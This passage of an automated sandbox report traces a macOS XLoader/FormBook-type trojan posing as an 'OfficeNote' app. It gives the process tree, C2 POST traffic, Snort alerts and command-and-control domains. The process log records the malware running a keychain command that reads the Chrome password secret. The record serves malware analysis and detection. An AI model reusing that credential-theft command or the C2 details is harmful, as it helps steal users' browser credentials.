65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.0.56	49174	34.102.136.180	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:54:55.530060053 CEST	153	OUT	POST /e8gp/ HTTP/1.1 Host: www.greaterudition.com Connection: close Content-Length: 120 Cache-Control: no-cache Origin: http://www.greaterudition.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.greaterudition.com/e8gp/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 78 68 63 30 4c 32 3d 75 66 6c 57 78 52 45 4f 7a 4e 64 69 37 70 7e 4c 28 69 33 32 73 78 44 34 45 4d 65 66 62 6d 55 66 4d 65 69 37 32 46 34 45 58 74 35 68 56 49 6f 4b 42 4f 78 58 71 36 4e 46 75 6e 33 5a 73 6c 4f 5f 35 66 50 54 66 44 42 61 61 67 4a 35 6a 58 6a 4f 48 51 6c 32 71 70 30 58 78 32 32 69 72 65 76 52 51 36 77 79 58 33 78 44 63 73 59 38 50 51 29 2e 00 00 00 00 00 00 00 Data Ascii: xhc0L2=uflWxREOzNdi7p~L(i32sxD4EMefbmUfMei72F4EXt5hVIoKBOxXq6NFun3ZslO_5fPTfDBaagJ5jXjOHQl2qp0Xx22irevRQ6wyX3xDcsY8PQ).
Aug 23, 2023 14:54:55.652010918 CEST	155	IN	HTTP/1.1 405 Not Allowed Server: openresty Date: Wed, 23 Aug 2023 12:54:55 GMT Content-Type: text/html Content-Length: 154 X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_PZeA/gT6ztfKAtOLG9zQz5VlslLj8k81yjk5E93HPP6qFQU6p0oZwPZtGxFrRw6YIvFVk2FP4QUPqicNtMECyw Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

System Behavior

Analysis Process: mono-sgen64 PID: 1004, Parent PID: 930

General

Start time:	14:52:08
Start date:	23/08/2023
Path:	/Library/Frameworks/Mono.framework/Versions/6.12.0/bin/mono-sgen64
Arguments:	-
File size:	4699168 bytes
MD5 hash:	98f65da8c6a62423d3f4cda359f06a87

Start time:	14:52:08
Start date:	23/08/2023
Path:	/usr/bin/open
Arguments:	/usr/bin/open /Volumes/OfficeNote/OfficeNote.app
File size:	339200 bytes
MD5 hash:	ef617087070a1fd1b01573fd9668328c

Start time:	14:52:08
Start date:	23/08/2023
Path:	/sbin/launchd
Arguments:	-
File size:	1145264 bytes
MD5 hash:	84235ce1176542efece62700b35517ff

Start time:	14:52:08
Start date:	23/08/2023
Path:	/usr/libexec/xpcproxy
Arguments:	xpcproxy application.OfficeNote.19.25
File size:	229408 bytes
MD5 hash:	ec5cba9702c028c784fa75e8214bc95e

Start time:	14:52:08
Start date:	23/08/2023
Path:	/Volumes/OfficeNote/OfficeNote.app/Contents/MacOS/OfficeNote
Arguments:	/Volumes/OfficeNote/OfficeNote.app/Contents/MacOS/OfficeNote
File size:	335872 bytes
MD5 hash:	42f942691bec23b60dcd5a587a2ec43f

Start time:	14:52:08
Start date:	23/08/2023
Path:	/Volumes/OfficeNote/OfficeNote.app/Contents/MacOS/OfficeNote
Arguments:	-
File size:	335872 bytes
MD5 hash:	42f942691bec23b60dcd5a587a2ec43f

Start time:	14:52:08
Start date:	23/08/2023
Path:	/bin/sh
Arguments:	sh -c /Users/rodrigo/73a470tO
File size:	134000 bytes
MD5 hash:	68a37d17986d5af3dc693748d56e9248

Start time:	14:52:08
Start date:	23/08/2023
Path:	/bin/bash
Arguments:	sh -c /Users/rodrigo/73a470tO
File size:	1326752 bytes
MD5 hash:	2a6caea9db40595c35bd53120c9e1393

Start time:	14:52:08
Start date:	23/08/2023
Path:	/Users/rodrigo/73a470tO
Arguments:	/Users/rodrigo/73a470tO
File size:	131904 bytes
MD5 hash:	c68e9ab57bff9de72414c83d612636dc

Start time:	14:52:08
Start date:	23/08/2023
Path:	/Users/rodrigo/73a470tO
Arguments:	-
File size:	131904 bytes
MD5 hash:	c68e9ab57bff9de72414c83d612636dc

Start time:	14:52:08
Start date:	23/08/2023
Path:	/bin/sh
Arguments:	sh -c /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps
File size:	134000 bytes
MD5 hash:	68a37d17986d5af3dc693748d56e9248

Start time:	14:52:08
Start date:	23/08/2023
Path:	/bin/bash
Arguments:	sh -c /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps
File size:	1326752 bytes
MD5 hash:	2a6caea9db40595c35bd53120c9e1393

Start time:	14:52:08
Start date:	23/08/2023
Path:	/Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps
Arguments:	/Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps
File size:	131904 bytes
MD5 hash:	c68e9ab57bff9de72414c83d612636dc

Start time:	14:52:08
Start date:	23/08/2023
Path:	/Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps
Arguments:	/Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps
File size:	131904 bytes
MD5 hash:	c68e9ab57bff9de72414c83d612636dc

Start time:	14:54:09
Start date:	23/08/2023
Path:	/Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps
Arguments:	-
File size:	131904 bytes
MD5 hash:	c68e9ab57bff9de72414c83d612636dc

Start time:	14:54:09
Start date:	23/08/2023
Path:	/bin/sh
Arguments:	sh -c security find-generic-password -wa 'Chrome'
File size:	134000 bytes
MD5 hash:	68a37d17986d5af3dc693748d56e9248

Start time:	14:54:09
Start date:	23/08/2023
Path:	/bin/bash
Arguments:	sh -c security find-generic-password -wa 'Chrome'
File size:	1326752 bytes
MD5 hash:	2a6caea9db40595c35bd53120c9e1393

Start time:	14:54:09
Start date:	23/08/2023
Path:	/usr/bin/security
Arguments:	security find-generic-password -wa Chrome
File size:	660752 bytes
MD5 hash:	05bb69f46a91f9b057f2e279de6a9435

Start time:	14:54:24
Start date:	23/08/2023
Path:	/Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps
Arguments:	-
File size:	131904 bytes
MD5 hash:	c68e9ab57bff9de72414c83d612636dc

Start time:	14:54:24
Start date:	23/08/2023
Path:	/bin/sh
Arguments:	sh -c rm /Users/rodrigo/obdL0Dl8
File size:	134000 bytes
MD5 hash:	68a37d17986d5af3dc693748d56e9248

Start time:	14:54:24
Start date:	23/08/2023
Path:	/bin/bash
Arguments:	sh -c rm /Users/rodrigo/obdL0Dl8
File size:	1326752 bytes
MD5 hash:	2a6caea9db40595c35bd53120c9e1393

Start time:	14:54:24
Start date:	23/08/2023
Path:	/bin/rm
Arguments:	rm /Users/rodrigo/obdL0Dl8
File size:	135440 bytes
MD5 hash:	dba08d0ccaff1fa37865ef9a1c8ed34d

Source: Traffic	Snort IDS: 2047697 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .growind .info) 192.168.0.56:55180 -> 4.2.2.1:53
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49165 -> 66.29.151.121:80
Source: Traffic	Snort IDS: 2047695 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .qq9122 .com) 192.168.0.56:54298 -> 4.2.2.1:53
Source: Traffic	Snort IDS: 2047695 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .qq9122 .com) 192.168.0.56:57483 -> 4.2.2.2:53
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49166 -> 137.220.225.54:80
Source: Traffic	Snort IDS: 2047696 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .corkagenexus .com) 192.168.0.56:60999 -> 4.2.2.2:53
Source: Traffic	Snort IDS: 2047696 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .corkagenexus .com) 192.168.0.56:63416 -> 4.2.2.1:53
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49167 -> 192.0.78.25:80
Source: Traffic	Snort IDS: 2047691 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .spv88 .online) 192.168.0.56:54348 -> 4.2.2.1:53
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49168 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49169 -> 146.148.179.231:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49170 -> 104.21.71.149:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49171 -> 185.215.4.57:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49173 -> 192.0.78.25:80
Source: Traffic	Snort IDS: 2047693 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .activ-ketodietakjsy620 .cloud) 192.168.0.56:55184 -> 4.2.2.2:53
Source: Traffic	Snort IDS: 2047693 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .activ-ketodietakjsy620 .cloud) 192.168.0.56:64276 -> 4.2.2.1:53
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49175 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2047686 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .brioche-amsterdam .com) 192.168.0.56:57563 -> 4.2.2.1:53
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49177 -> 104.21.26.182:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49179 -> 172.67.200.50:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49180 -> 66.29.151.121:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49182 -> 137.220.225.54:80
Source: Traffic	Snort IDS: 2047696 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .corkagenexus .com) 192.168.0.56:64207 -> 4.2.2.1:53
Source: Traffic	Snort IDS: 2047696 ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .corkagenexus .com) 192.168.0.56:57571 -> 4.2.2.2:53
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49184 -> 192.0.78.25:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49186 -> 188.114.96.3:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49188 -> 146.148.179.231:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.56:49190 -> 104.21.71.149:80

Source: OfficeNote	String found in binary or memory: http://certs.apple.com/wwdrg3.der01
Source: OfficeNote	String found in binary or memory: http://crl.apple.com/root.crl0
Source: OfficeNote	String found in binary or memory: http://ocsp.apple.com/ocsp03-applerootca0.
Source: OfficeNote	String found in binary or memory: http://ocsp.apple.com/ocsp03-wwdrg3050
Source: Info.plist, OfficeNote, CodeResources	String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: OfficeNote	String found in binary or memory: https://www.apple.com/appleca/0
Source: OfficeNote	String found in binary or memory: https://www.apple.com/certificateauthority/0

Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.2
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.2
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.2
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.2
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.2
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.2
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.2
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.2
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.2
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.2
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.2
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.2
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.2
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.2
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.2
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.2
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.2
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.1
Source: unknown	UDP traffic detected without corresponding DNS query: 4.2.2.2

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Aug 2023 12:52:20 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 23 Aug 2023 12:53:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Wed, 23 Aug 2023 12:53:25 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yjz1AaLUU%2Bk%2BwKS4tYkMqWPBIBP1Q4ushclUAL3ml2IYfg1Cxi4610%2B%2FysPEasc4IOAbyk4zPKDJ4d2NKlUVs6DXlQfZ3h3JeMfTfJzT59yd3UBH%2BTEtCKZ0S6yGAk1EsUMv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 7fb37f320ae69219-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 61 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 Data Ascii: 11a4<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 23 Aug 2023 12:54:55 GMTContent-Type: text/htmlContent-Length: 291ETag: "64e2c541-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Aug 2023 12:55:37 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 